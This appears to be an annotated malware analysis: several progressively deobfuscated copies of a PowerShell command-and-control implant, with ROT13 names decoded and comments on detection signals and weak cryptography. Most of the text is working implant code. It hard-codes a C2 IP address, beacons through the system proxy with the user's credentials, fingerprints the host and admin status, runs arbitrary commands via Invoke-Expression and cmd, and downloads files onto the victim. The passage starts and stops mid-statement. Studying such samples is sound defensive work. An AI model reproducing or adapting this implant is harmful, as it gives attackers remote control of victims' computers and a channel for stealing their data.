| return kXB_.Exception.Message | |
| } | |
| } | |
| elseif(kXBpzq.StartsWith(V7XcmdV7X)){ | |
| kXBpzq= | |
| 0x2c9b1b8 (23802):   // third copy; additionally Jx1 -> | and 6az -> \ are decoded (compare the Riny and trgVC bodies); kXB and V7X remain. Cut off mid-statement above. | |
| kXBglobal:url = "" | |
| kXBglobal:id = "" | |
| kXBcevingr = 959, 713 | |
| kXBchoyvp = 37, 437 | |
| kXBC = @(V7Xhttp://185.162.235.182V7X) | |
| function Zbq(kXBx, kXBH, kXBn){ | |
| kXBXi = kXBx | |
| kXBEi = kXBH | |
| kXBYi = 1 | |
| while(kXBEi -gt 0){ | |
| if((kXBEi % 2) -eq 0) { | |
| kXBXi = (kXBXi * kXBXi) % kXBn | |
| kXBEi = kXBEi / 2 | |
| } else { | |
| kXBYi = (kXBXi * kXBYi) % kXBn | |
| kXBEi = kXBEi - 1 | |
| } | |
| } | |
| return kXBYi | |
| } | |
| function raPelcg(kXBpk, kXBcynvagrkg){ | |
| try{ | |
| kXBxrl, kXBn = kXBpk; | |
| kXBzlneenl = @(); | |
| for(kXBi=0; kXBi -lt kXBcynvagrkg.Length; kXBi++){ | |
| kXBahz = [int][char]kXBcynvagrkg[kXBi] | |
| kXBt = Zbq kXBahz kXBxrl kXBn | |
| kXBzlneenl += kXBt | |
| } | |
| return kXBzlneenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| function qrPelcg(kXBpk, kXBpvcuregrkg){ | |
| try{ | |
| kXBxrl, kXBn = kXBpk; | |
| kXBzl_neenl = @(); | |
| for (kXBi = 0 ; kXBi -lt kXBpvcuregrkg.Length; kXBi++){ | |
| kXBahz = [int]kXBpvcuregrkg[kXBi] | |
| kXBt = Zbq kXBahz kXBxrl kXBn | |
| kXBzl_neenl += [convert]::ToChar([int]kXBt) | |
| } | |
| return -join kXBzl_neenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| function uggcCBFG(kXBhey,kXBrap_zft){ | |
| trgEnaqbzCebkl | |
| try{ | |
| kXBpbagrag = kXBrap_zft | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBglobal:url + kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBrapbqr_qngn = [System.Text.Encoding]::UTF8.GetBytes(kXBpbagrag); | |
| kXBjroerd.Method = "POST"; | |
| kXBjroerd.ContentLength = kXBrapbqr_qngn.length; | |
| kXBjroerd.ContentType = "application/json" | |
| if (kXBrapbqr_qngn.Length -gt 0){ | |
| kXBerd_fgernz = kXBjroerd.GetRequestStream(); | |
| kXBerd_fgernz.Write(kXBrapbqr_qngn, 0, kXBrapbqr_qngn.Length); | |
| } | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| kXBerfhyg = "error" | |
| write-host kXBhey "`t" (kXBglobal:url + kXB_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return kXBerfhyg | |
| } | |
| function uggcTRG(kXBhey){ | |
| trgEnaqbzCebkl | |
| try | |
| { | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBglobal:url + kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBjroerd.Method = "GET"; | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| kXBerfhyg = "error" | |
| write-host kXBhey "`t" (kXBglobal:url + kXB_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return kXBerfhyg | |
| } | |
| function fuggcTRG(kXBhey){ | |
| try | |
| { | |
| kXBjroerd = [System.Net.WebRequest]::Create(kXBhey); | |
| kXBjroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBjroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBjroerd.Method = "GET"; | |
| [System.Net.WebResponse] kXBerfc = kXBjroerd.GetResponse(); | |
| if (kXBerfc -ne kXBnull){ | |
| kXBqngn = kXBerfc.GetResponseStream(); | |
| [System.IO.StreamReader] kXBerf_qngn = New-Object System.IO.StreamReader kXBqngn; | |
| [String] kXBerfhyg = kXBerf_qngn.ReadToEnd(); | |
| } | |
| } | |
| catch { | |
| kXBerfhyg = "" | |
| } | |
| return kXBerfhyg | |
| } | |
| function Riny(kXBpzq){ | |
| try{ | |
| kXBbhg = IEX kXBpzq -ErrorAction SilentlyContinue | |
| if(kXBpzq.StartsWith("cd")){kXBbhg = kXBPWD;} | |
| kXBbhg = (kXBbhg | Out-String) | |
| } catch { | |
| kXBbhg = kXB_.Exception.Message | |
| } | |
| return kXBbhg | |
| } | |
| function vasbvavg(){ | |
| function trgVC(){ | |
| try{ | |
| return (kXB(ipconfig | where {kXB_ -match V7XIPv4.+\s(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})V7X } | out-null; kXBZngpurf[1])); | |
| } catch { | |
| return "ErrorIP"; | |
| } | |
| } | |
| function trgBF(){ | |
| try{ | |
| return ((get-itemproperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ProductName).ProductName) | |
| } catch { | |
| return "ErrorOS"; | |
| } | |
| } | |
| function trgNepu(){ | |
| try{ | |
| if([System.IntPtr]::Size -eq 4){ | |
| return "32-bit" | |
| } | |
| else{ | |
| return "64-bit" | |
| } | |
| } catch { | |
| return "ErrorArch"; | |
| } | |
| } | |
| function trgQbznva(){ | |
| try{ | |
| return ((net config workstation) -match V7XWorkstation domain\s+\S+kXBV7X -replace V7X.+?(\S+)kXBV7X,V7XkXB1V7X); | |
| } catch { | |
| return "ErrorDomain"; | |
| } | |
| } | |
| function trgUbfgAnzr(){ | |
| try{ | |
| return ([System.Net.DNS]::GetHostByName(V7XV7X).HostName); | |
| } catch { | |
| return "ErrorHostName"; | |
| } | |
| } | |
| function trgHfreanzr(){ | |
| try{ | |
| try{ | |
| kXBsfb = New-Object -ComObject Scripting.FileSystemObject; | |
| kXBhfre = kXBenv:UserName | |
| kXBghfre = kXBhfre.replace(V7X[^a-zA-Z0-9]V7X,V7XV7X) | |
| if(kXBghfr -eq kXBhfre){ | |
| return kXBhfre | |
| } | |
| return (kXBsfb.getfolder(V7Xc:\\users\\V7X + kXBenv:UserName).ShortName) | |
| } catch { | |
| return kXBenv:UserName | |
| } | |
| } catch { | |
| return "-" | |
| } | |
| } | |
| function vfNqzva(){ | |
| try{ | |
| kXBJvaqbjfVqragvgl = [system.security.principal.windowsidentity]::GetCurrent() | |
| kXBCevapvcny = New-Object System.Security.Principal.WindowsPrincipal(kXBJvaqbjfVqragvgl) | |
| kXBNqzvaEbyr = [System.Security.Principal.WindowsBuiltInRole]::Administrator | |
| if (kXBCevapvcny.IsInRole(kXBNqzvaEbyr)) | |
| { | |
| return V7X+V7X | |
| } | |
| else | |
| { | |
| return V7XV7X | |
| } | |
| } catch { | |
| return "" | |
| } | |
| } | |
| function trgCVC(){ | |
| try{ | |
| kXBernyVC = fuggcTRG "https://v4.ident.me/" | |
| return kXBernyVC | |
| } catch { | |
| return "ErrorPublicIP" | |
| } | |
| } | |
| kXBFlfVasb = trgBF | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgVC | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgNepu | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgUbfgAnzr | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgQbznva | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += vfNqzva | |
| kXBFlfVasb += trgHfreanzr | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgCVC | |
| kXBglobal:id = zq5trarengbe(kXBFlfVasb) | |
| return (kXBglobal:id + V7X**V7X + kXBFlfVasb) | |
| } | |
| function zq5trarengbe(kXBfgeVa){ | |
| kXBzq5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider | |
| kXBhgs8 = new-object -TypeName System.Text.UTF8Encoding | |
| kXBunfu = [System.BitConverter]::ToString(kXBzq5.ComputeHash(kXBhgs8.GetBytes(kXBfgeVa))) | |
| kXBbhgchg = kXBunfu.replace(V7X-V7X,V7XV7X) | |
| return kXBbhgchg | |
| } | |
| function pbzznaq_naq_pbageby(kXBpzq){ | |
| try{ | |
| if(kXBpzq.StartsWith(V7XuploadV7X)){ | |
| try{ | |
| kXBpzq=kXBpzq.replace(V7Xupload V7X,V7XV7X) | |
| kXBwc = New-Object System.Net.WebClient | |
| kXBwc.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBwc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBwc.DownloadFile(kXBpzq, ("c:\programdata\" + kXBpzq.Substring(kXBpzq.LastIndexOf(V7X/V7X),kXBpzq.Length-kXBpzq.LastIndexOf(V7X/V7X)))) | |
| return Riny "pwd" | |
| }catch{ | |
| return kXB_.Exception.Message | |
| } | |
| } | |
| elseif(kXBpzq.StartsWith(V7XcmdV7X)){ | |
| kXBpzq=kXBpzq.replace(V7Xcmd V7X,V7XV7X) | |
| t | |
| 0x2ca3c40 (22574):   // fourth copy; kXB -> $ is now decoded as well, leaving only V7X (presumably '). This is the most readable copy; its vasbvavg runs past the end of this excerpt. | |
| # Stage-2 C2 agent globals (fourth dump copy; only V7X, presumably ', is still encoded). | |
| # $global:id is assigned by vasbvavg ("infoinit") as MD5 of the host fingerprint. | |
| $global:url = "" | |
| $global:id = "" | |
| # ROT13 "private"/"public": (exponent, modulus) pairs for the per-character modexp in raPelcg/qrPelcg. | |
| # 713 and 437 are toy moduli — any traffic framed with them is reversible offline. | |
| $cevingr = 959, 713 | |
| $choyvp = 37, 437 | |
| # C2 host (undefanged) | |
| $C = @(V7Xhttp://185.162.235.182V7X) | |
| # Zbq (ROT13 "Mod"): square-and-multiply modular exponentiation, returns x^H mod n. | |
| function Zbq($x, $H, $n){ | |
| $Xi = $x | |
| $Ei = $H | |
| $Yi = 1 | |
| while($Ei -gt 0){ | |
| if(($Ei % 2) -eq 0) { | |
| # even exponent: square base, halve exponent | |
| $Xi = ($Xi * $Xi) % $n | |
| $Ei = $Ei / 2 | |
| } else { | |
| # odd exponent: multiply into accumulator, decrement | |
| $Yi = ($Xi * $Yi) % $n | |
| $Ei = $Ei - 1 | |
| } | |
| } | |
| return $Yi | |
| } | |
| # raPelcg (ROT13 "enCrypt"): per-character textbook RSA, ord(c)^e mod n for each char, as an int | |
| # array. Deterministic and unpadded, so it is a substitution mapping an analyst can tabulate. | |
| function raPelcg($pk, $cynvagrkg){ | |
| try{ | |
| $xrl, $n = $pk; | |
| $zlneenl = @(); | |
| for($i=0; $i -lt $cynvagrkg.Length; $i++){ | |
| $ahz = [int][char]$cynvagrkg[$i] | |
| $t = Zbq $ahz $xrl $n | |
| $zlneenl += $t | |
| } | |
| return $zlneenl | |
| } | |
| catch{ | |
| # trgEnaqbzCebkl ("getRandomProxy") is not defined in any copy in this excerpt | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| # qrPelcg (ROT13 "deCrypt"): inverse of raPelcg — modexp each int of the ciphertext array with pk | |
| # and join the resulting chars into a string. | |
| function qrPelcg($pk, $pvcuregrkg){ | |
| try{ | |
| $xrl, $n = $pk; | |
| $zl_neenl = @(); | |
| for ($i = 0 ; $i -lt $pvcuregrkg.Length; $i++){ | |
| $ahz = [int]$pvcuregrkg[$i] | |
| $t = Zbq $ahz $xrl $n | |
| $zl_neenl += [convert]::ToChar([int]$t) | |
| } | |
| return -join $zl_neenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| # uggcCBFG (ROT13 "httpPOST"): POST $rap_zft ("enc_msg") as application/json to $global:url + $hey | |
| # through the system proxy with the user's default credentials; returns the response body. | |
| # Failure path: returns "error", echoes the exception, sleeps a random 20-40 s. Streams are never disposed. | |
| function uggcCBFG($hey,$rap_zft){ | |
| trgEnaqbzCebkl | |
| try{ | |
| $pbagrag = $rap_zft | |
| $jroerd = [System.Net.WebRequest]::Create($global:url + $hey); | |
| $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| $rapbqr_qngn = [System.Text.Encoding]::UTF8.GetBytes($pbagrag); | |
| $jroerd.Method = "POST"; | |
| $jroerd.ContentLength = $rapbqr_qngn.length; | |
| $jroerd.ContentType = "application/json" | |
| if ($rapbqr_qngn.Length -gt 0){ | |
| $erd_fgernz = $jroerd.GetRequestStream(); | |
| $erd_fgernz.Write($rapbqr_qngn, 0, $rapbqr_qngn.Length); | |
| } | |
| [System.Net.WebResponse] $erfc = $jroerd.GetResponse(); | |
| if ($erfc -ne $null){ | |
| $qngn = $erfc.GetResponseStream(); | |
| [System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn; | |
| [String] $erfhyg = $erf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| $erfhyg = "error" | |
| write-host $hey "`t" ($global:url + $_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return $erfhyg | |
| } | |
| # uggcTRG (ROT13 "httpGET"): GET $global:url + $hey via the system proxy with default credentials; | |
| # body on success, "error" plus a 20-40 s random sleep on failure. | |
| function uggcTRG($hey){ | |
| trgEnaqbzCebkl | |
| try | |
| { | |
| $jroerd = [System.Net.WebRequest]::Create($global:url + $hey); | |
| $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| $jroerd.Method = "GET"; | |
| [System.Net.WebResponse] $erfc = $jroerd.GetResponse(); | |
| if ($erfc -ne $null){ | |
| $qngn = $erfc.GetResponseStream(); | |
| [System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn; | |
| [String] $erfhyg = $erf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| $erfhyg = "error" | |
| write-host $hey "`t" ($global:url + $_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return $erfhyg | |
| } | |
| # fuggcTRG (ROT13 "shttpGET"): GET an absolute URL (no C2 prefix) via the system proxy; "" on any | |
| # failure, with no sleep or proxy helper call. Used for the https://v4.ident.me/ public-IP lookup. | |
| function fuggcTRG($hey){ | |
| try | |
| { | |
| $jroerd = [System.Net.WebRequest]::Create($hey); | |
| $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| $jroerd.Method = "GET"; | |
| [System.Net.WebResponse] $erfc = $jroerd.GetResponse(); | |
| if ($erfc -ne $null){ | |
| $qngn = $erfc.GetResponseStream(); | |
| [System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn; | |
| [String] $erfhyg = $erf_qngn.ReadToEnd(); | |
| } | |
| } | |
| catch { | |
| $erfhyg = "" | |
| } | |
| return $erfhyg | |
| } | |
| # Riny (ROT13 "Eval"): arbitrary-command execution via Invoke-Expression; output is rendered with | |
| # Out-String. Commands beginning with "cd" report $PWD instead. Exceptions are returned as text. | |
| function Riny($pzq){ | |
| try{ | |
| $bhg = IEX $pzq -ErrorAction SilentlyContinue | |
| if($pzq.StartsWith("cd")){$bhg = $PWD;} | |
| $bhg = ($bhg | Out-String) | |
| } catch { | |
| $bhg = $_.Exception.Message | |
| } | |
| return $bhg | |
| } | |
| # vasbvavg -- ROT13 of "infoinit": builds the host fingerprint sent at check-in. | |
| # Returns "<id>**<sysinfo>", where <id> is the MD5 of the "**"-joined fields assembled at the | |
| # bottom and is also stored in $global:id for later requests. Every nested getter swallows | |
| # its own errors and substitutes a placeholder so one failure cannot abort the check-in. | |
| # In this dump segment the token V7X stands in for a single quote (see the decoded copy of | |
| # this function later in the file). | |
| function vasbvavg(){ | |
| # trgVC = "getIP": local IPv4 from ipconfig (ipconfig.exe is spawned as a child of PowerShell). | |
| # $Zngpurf is ROT13 of "Matches" but is NOT the automatic $Matches variable, so the capture | |
| # group is never actually read -- most likely the identifier obfuscator rewrote the automatic | |
| # variable along with everything else. Expect this field to be empty in real traffic. | |
| function trgVC(){ | |
| try{ | |
| return ($(ipconfig | where {$_ -match V7XIPv4.+\s(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})V7X } | out-null; $Zngpurf[1])); | |
| } catch { | |
| return "ErrorIP"; | |
| } | |
| } | |
| # trgBF = "getOS": Windows edition name read from the registry. | |
| function trgBF(){ | |
| try{ | |
| return ((get-itemproperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ProductName).ProductName) | |
| } catch { | |
| return "ErrorOS"; | |
| } | |
| } | |
| # trgNepu = "getArch": pointer size of *this* PowerShell process, so a 32-bit host process on a | |
| # 64-bit OS is reported as "32-bit". | |
| function trgNepu(){ | |
| try{ | |
| if([System.IntPtr]::Size -eq 4){ | |
| return "32-bit" | |
| } | |
| else{ | |
| return "64-bit" | |
| } | |
| } catch { | |
| return "ErrorArch"; | |
| } | |
| } | |
| # trgQbznva = "getDomain": runs net.exe ("net config workstation", another child process), keeps | |
| # the "Workstation domain" line (-match on an array filters it) and returns its last token. | |
| function trgQbznva(){ | |
| try{ | |
| return ((net config workstation) -match V7XWorkstation domain\s+\S+$V7X -replace V7X.+?(\S+)$V7X,V7X$1V7X); | |
| } catch { | |
| return "ErrorDomain"; | |
| } | |
| } | |
| # trgUbfgAnzr = "getHostName": an empty name asks DNS for the local host's own entry. | |
| function trgUbfgAnzr(){ | |
| try{ | |
| return ([System.Net.DNS]::GetHostByName(V7XV7X).HostName); | |
| } catch { | |
| return "ErrorHostName"; | |
| } | |
| } | |
| # trgHfreanzr = "getUsername". Two defects: String.Replace is a literal replace, so the | |
| # regex-looking pattern strips nothing, and $ghfr (undefined) is a typo for $ghfre, so the early | |
| # return never fires for a non-empty username. The code therefore always falls through to the | |
| # 8.3 short name of the profile folder via Scripting.FileSystemObject, and to $env:UserName on error. | |
| function trgHfreanzr(){ | |
| try{ | |
| try{ | |
| $sfb = New-Object -ComObject Scripting.FileSystemObject; | |
| $hfre = $env:UserName | |
| $ghfre = $hfre.replace(V7X[^a-zA-Z0-9]V7X,V7XV7X) | |
| if($ghfr -eq $hfre){ | |
| return $hfre | |
| } | |
| return ($sfb.getfolder(V7Xc:\\users\\V7X + $env:UserName).ShortName) | |
| } catch { | |
| return $env:UserName | |
| } | |
| } catch { | |
| return "-" | |
| } | |
| } | |
| # vfNqzva = "isAdmin": "+" when the current token holds the Administrators role, else "". | |
| # Under UAC an unelevated administrator's filtered token does not hold the role, so "+" means | |
| # the session is actually elevated. | |
| function vfNqzva(){ | |
| try{ | |
| $JvaqbjfVqragvgl = [system.security.principal.windowsidentity]::GetCurrent() | |
| $Cevapvcny = New-Object System.Security.Principal.WindowsPrincipal($JvaqbjfVqragvgl) | |
| $NqzvaEbyr = [System.Security.Principal.WindowsBuiltInRole]::Administrator | |
| if ($Cevapvcny.IsInRole($NqzvaEbyr)) | |
| { | |
| return V7X+V7X | |
| } | |
| else | |
| { | |
| return V7XV7X | |
| } | |
| } catch { | |
| return "" | |
| } | |
| } | |
| # trgCVC = "getPIP": public IP via an external echo service. powershell.exe contacting an | |
| # IP-lookup service is itself a useful network detection signal for this check-in. | |
| function trgCVC(){ | |
| try{ | |
| $ernyVC = fuggcTRG "https://v4.ident.me/" | |
| return $ernyVC | |
| } catch { | |
| return "ErrorPublicIP" | |
| } | |
| } | |
| # Field order: OS**localIP**arch**hostname**domain**[+]username**publicIP. The admin flag is | |
| # glued directly onto the username (no "**" between them), so "+bob" denotes an elevated | |
| # session. $FlfVasb = ROT13 "SysInfo". | |
| $FlfVasb = trgBF | |
| $FlfVasb += "**" | |
| $FlfVasb += trgVC | |
| $FlfVasb += "**" | |
| $FlfVasb += trgNepu | |
| $FlfVasb += "**" | |
| $FlfVasb += trgUbfgAnzr | |
| $FlfVasb += "**" | |
| $FlfVasb += trgQbznva | |
| $FlfVasb += "**" | |
| $FlfVasb += vfNqzva | |
| $FlfVasb += trgHfreanzr | |
| $FlfVasb += "**" | |
| $FlfVasb += trgCVC | |
| # Victim id = MD5 of the whole fingerprint, so it changes whenever any field (e.g. the public | |
| # IP) changes. | |
| $global:id = zq5trarengbe($FlfVasb) | |
| return ($global:id + V7X**V7X + $FlfVasb) | |
| } | |
| # zq5trarengbe -- ROT13 of "md5generator": MD5 of the UTF-8 bytes of $fgeVa ("strIn"), returned | |
| # as 32 uppercase hex characters (BitConverter output with the dashes removed). Used here only | |
| # as the victim identifier built in vasbvavg. V7X stands in for a single quote in this segment. | |
| function zq5trarengbe($fgeVa){ | |
| $zq5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider | |
| $hgs8 = new-object -TypeName System.Text.UTF8Encoding | |
| $unfu = [System.BitConverter]::ToString($zq5.ComputeHash($hgs8.GetBytes($fgeVa))) | |
| # $unfu = "hash", $bhgchg = "output". | |
| $bhgchg = $unfu.replace(V7X-V7X,V7XV7X) | |
| return $bhgchg | |
| } | |
| function pbzznaq_naq_pbageby($pzq){ | |
| try{ | |
| if($pzq.StartsWith(V7XuploadV7X)){ | |
| try{ | |
| $pzq=$pzq.replace(V7Xupload V7X,V7XV7X) | |
| $wc = New-Object System.Net.WebClient | |
| $wc.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| $wc.DownloadFile($pzq, ("c:\programdata\" + $pzq.Substring($pzq.LastIndexOf(V7X/V7X),$pzq.Length-$pzq.LastIndexOf(V7X/V7X)))) | |
| return Riny "pwd" | |
| }catch{ | |
| return $_.Exception.Message | |
| } | |
| } | |
| elseif($pzq.StartsWith(V7XcmdV7X)){ | |
| $pzq=$pzq.replace(V7Xcmd V7X,V7XV7X) | |
| try{ | |
| $bhg = cmd /c $pzq | |
| $bhg = $bhg | Out-String | |
| return $bhg | |
| } catch { | |
| return $_.Exception.Message | |
| } | |
| } | |
| elseif($pzq.StartsWith(V7Xb64V7X)){ | |
| $pzq=$pzq.replace(V7Xb64 V7X,V7XV7X) | |
| try{ | |
| $pzq = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($pzq)) | |
| $bhg = Ri | |
| 0x2cac1c0 (22310): | |
| # Global state and key material of the decoded implant. | |
| # $global:url is the C2 base that uggcTRG/uggcCBFG prefix to every request path; it starts | |
| # empty and is presumably populated from $C by trgEnaqbzCebkl ("getRandomProxy"), which is | |
| # not part of this excerpt. | |
| $global:url = "" | |
| # $global:id = MD5 victim identifier, filled in by vasbvavg. | |
| $global:id = "" | |
| # $cevingr = "private", $choyvp = "public": (exponent, modulus) pairs consumed by raPelcg / | |
| # qrPelcg through Zbq. 713 = 23*31 and 437 = 19*23 -- ten-bit moduli, so the "RSA" here is a | |
| # per-character substitution with no real confidentiality; captured traffic can be decoded | |
| # offline from these constants alone. | |
| $cevingr = 959, 713 | |
| $choyvp = 37, 437 | |
| # $C = C2 list; its single entry matches the C2 address noted in the header of this file. | |
| $C = @('http://185.162.235.182') | |
| # Zbq -- ROT13 of "Mod": modular exponentiation, returns $x ^ $H mod $n by the right-to-left | |
| # binary method. Loop invariant: $Yi * $Xi^$Ei == $x^$H (mod $n). An even exponent squares the | |
| # base and halves the exponent; an odd one multiplies the base into the accumulator and | |
| # decrements. $H = 0 yields 1. The division is exact because it only runs when $Ei is even. | |
| function Zbq($x, $H, $n){ | |
| $Xi = $x | |
| $Ei = $H | |
| $Yi = 1 | |
| while($Ei -gt 0){ | |
| if(($Ei % 2) -eq 0) { | |
| $Xi = ($Xi * $Xi) % $n | |
| $Ei = $Ei / 2 | |
| } else { | |
| $Yi = ($Xi * $Yi) % $n | |
| $Ei = $Ei - 1 | |
| } | |
| } | |
| return $Yi | |
| } | |
| # raPelcg -- ROT13 of "enCrypt": maps each character of $cynvagrkg ("plaintext") to | |
| # charcode ^ key mod n, using the ($xrl = "key", $n) pair passed in $pk, and returns the array | |
| # of integers. With a fixed key every character always yields the same number, so the output | |
| # is a monoalphabetic substitution; character codes >= $n cannot be recovered uniquely. | |
| # On any error it calls trgEnaqbzCebkl (defined outside this excerpt) and returns nothing. | |
| function raPelcg($pk, $cynvagrkg){ | |
| try{ | |
| $xrl, $n = $pk; | |
| # $zlneenl = "myarray"; grown by += per character. | |
| $zlneenl = @(); | |
| for($i=0; $i -lt $cynvagrkg.Length; $i++){ | |
| $ahz = [int][char]$cynvagrkg[$i] | |
| $t = Zbq $ahz $xrl $n | |
| $zlneenl += $t | |
| } | |
| return $zlneenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| # qrPelcg -- ROT13 of "deCrypt": inverse of raPelcg. Each element of $pvcuregrkg ("ciphertext") | |
| # is raised to the key and reduced mod n, the result is cast to a char, and the chars are | |
| # joined into a string. Same error handling as raPelcg: trgEnaqbzCebkl is called (not in this | |
| # excerpt) and nothing is returned. | |
| function qrPelcg($pk, $pvcuregrkg){ | |
| try{ | |
| $xrl, $n = $pk; | |
| $zl_neenl = @(); | |
| for ($i = 0 ; $i -lt $pvcuregrkg.Length; $i++){ | |
| $ahz = [int]$pvcuregrkg[$i] | |
| $t = Zbq $ahz $xrl $n | |
| $zl_neenl += [convert]::ToChar([int]$t) | |
| } | |
| return -join $zl_neenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| # uggcCBFG -- ROT13 of "httpPOST": POSTs $rap_zft ("enc_msg") as UTF-8 bytes to | |
| # $global:url + $hey with Content-Type application/json and returns the response body, or the | |
| # literal "error". trgEnaqbzCebkl (outside this excerpt) runs before every attempt and again on | |
| # failure, followed by a 20-40 s random sleep -- a randomized back-off visible in beacon timing. | |
| function uggcCBFG($hey,$rap_zft){ | |
| trgEnaqbzCebkl | |
| try{ | |
| # $pbagrag = "content"; sent verbatim, whatever the caller encoded into it. | |
| $pbagrag = $rap_zft | |
| $jroerd = [System.Net.WebRequest]::Create($global:url + $hey); | |
| # System proxy with the user's default credentials; no User-Agent is set. | |
| $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| $rapbqr_qngn = [System.Text.Encoding]::UTF8.GetBytes($pbagrag); | |
| $jroerd.Method = "POST"; | |
| $jroerd.ContentLength = $rapbqr_qngn.length; | |
| $jroerd.ContentType = "application/json" | |
| if ($rapbqr_qngn.Length -gt 0){ | |
| # Request stream is written but never closed explicitly. | |
| $erd_fgernz = $jroerd.GetRequestStream(); | |
| $erd_fgernz.Write($rapbqr_qngn, 0, $rapbqr_qngn.Length); | |
| } | |
| [System.Net.WebResponse] $erfc = $jroerd.GetResponse(); | |
| if ($erfc -ne $null){ | |
| $qngn = $erfc.GetResponseStream(); | |
| [System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn; | |
| # Whole body read into memory; response and reader are never disposed. | |
| [String] $erfhyg = $erf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| $erfhyg = "error" | |
| # Debug output left in: the path and exception text are printed to the console on failure. | |
| write-host $hey "`t" ($global:url + $_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return $erfhyg | |
| } | |
| # uggcTRG -- ROT13 of "httpGET": GET of $global:url + $hey (C2 base plus path) and return the | |
| # body, or the literal "error". Like uggcCBFG it calls trgEnaqbzCebkl (outside this excerpt) | |
| # before the attempt and on failure, then sleeps 20-40 s. Contrast fuggcTRG, which takes an | |
| # absolute URL and returns "" on failure. | |
| function uggcTRG($hey){ | |
| trgEnaqbzCebkl | |
| try | |
| { | |
| $jroerd = [System.Net.WebRequest]::Create($global:url + $hey); | |
| # System proxy with the user's default credentials; no User-Agent is set. | |
| $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| $jroerd.Method = "GET"; | |
| [System.Net.WebResponse] $erfc = $jroerd.GetResponse(); | |
| if ($erfc -ne $null){ | |
| $qngn = $erfc.GetResponseStream(); | |
| [System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn; | |
| # Whole body read into memory; response and reader are never disposed. | |
| [String] $erfhyg = $erf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| $erfhyg = "error" | |
| # Debug output left in: the path and exception text are printed to the console on failure. | |
| write-host $hey "`t" ($global:url + $_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return $erfhyg | |
| } | |
